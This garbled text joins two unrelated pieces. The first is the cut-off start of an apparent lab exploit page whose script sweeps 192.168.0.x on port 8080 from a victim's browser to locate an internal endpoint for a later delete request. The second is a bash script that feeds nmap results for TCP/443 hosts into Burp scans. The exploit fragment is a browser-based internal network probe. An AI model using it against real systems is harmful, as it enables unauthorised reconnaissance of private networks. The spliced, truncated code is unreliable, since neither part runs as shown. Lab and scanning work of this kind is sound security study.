<!-- each script tag below is a separate exploit page to use on the server, for this multi-step lab -->
<!-- technically only the first (to find the IP) and last (to execute the delete) are needed, but the
middle two scripts were used by me to explore the site and craft the final exploit -->
<!-- find the IP address of the internal endpoint -->
<script> | |
for(var i = 1; i <= 254; i++) { | |
var req = new XMLHttpRequest(); | |
req.open('get', 'http://192.168.0.' + i + ':8080/', true); | |
req.onload = report(i); |
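#!/bin/bash
# Queue a Burp scan for every host that a simple nmap scan reports with
# TCP/443 open.
#
# Usage: <script> TARGET
#   TARGET  nmap target specification, passed to nmap as a single argument
#
# Requires nmap, awk and curl, plus a Burp REST API listener on
# 127.0.0.1:1337.
#
# NOTE(review): the endpoint below has no API-key path segment, which only
# works when the Burp REST API accepts unauthenticated requests. Confirm that
# is intended and that the listener is reachable from loopback only; if a key
# is introduced, keep it out of argv, since process listings expose arguments.

readonly BURP_SCAN_ENDPOINT='http://127.0.0.1:1337/v0.1/scan'

# Print a message on stderr and stop with a failure status.
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

if (( $# < 1 )) || [[ -z "$1" ]]; then
  printf 'Usage: %s TARGET\n' "${0##*/}" >&2
  exit 2
fi

# A target that starts with '-' would be parsed by nmap as an option, not as
# a host, so it is rejected before nmap ever sees it.
[[ "$1" != -* ]] || die "refusing target that looks like an option: $1"

# The original passed a bare "443", which nmap reads as a second target
# rather than a port; -p limits the scan to TCP/443 as the header describes.
scan_output=$(nmap -p 443 --open --resolve-all -oG - "$1") \
  || die "nmap failed for target: $1"

# Grepable output carries the address in field 2 of each "Host:" record.
# Only records whose Ports: field reports an open port are kept (the header
# line echoes the command line, "--open" included), and repeats are dropped.
sites=()
while IFS= read -r address; do
  sites+=("$address")
done < <(
  awk '/^Host: / && /Ports:.*\/open\// && !seen[$2]++ { print $2 }' \
    <<<"$scan_output"
)

if (( ${#sites[@]} == 0 )); then
  printf 'No hosts with TCP/443 open were found for %s.\n' "$1" >&2
  exit 0
fi

failures=0
for site in "${sites[@]}"; do
  # The address is spliced into the JSON body unescaped, so only characters
  # that can occur in an IPv4/IPv6 literal are accepted.
  if [[ "$site" == *[!0-9A-Fa-f.:]* ]]; then
    printf 'Skipping unexpected nmap field: %s\n' "$site" >&2
    failures=$((failures + 1))
    continue
  fi

  payload=$(printf '{"urls":["%s"]}' "$site")

  # NOTE(review): the bare address (no scheme) is sent exactly as the
  # original did; confirm the Burp API accepts that form as a URL.
  # --fail makes an HTTP error status count as a failure instead of being
  # discarded along with the response body.
  if curl -sS --fail -o /dev/null -d "$payload" "$BURP_SCAN_ENDPOINT"; then
    printf "Scanning %s with burp.\\n" "$site"
  else
    printf 'Burp scan request failed for %s.\n' "$site" >&2
    failures=$((failures + 1))
  fi
done

# Surface partial failure to the caller instead of always exiting 0.
if (( failures > 0 )); then
  exit 1
fi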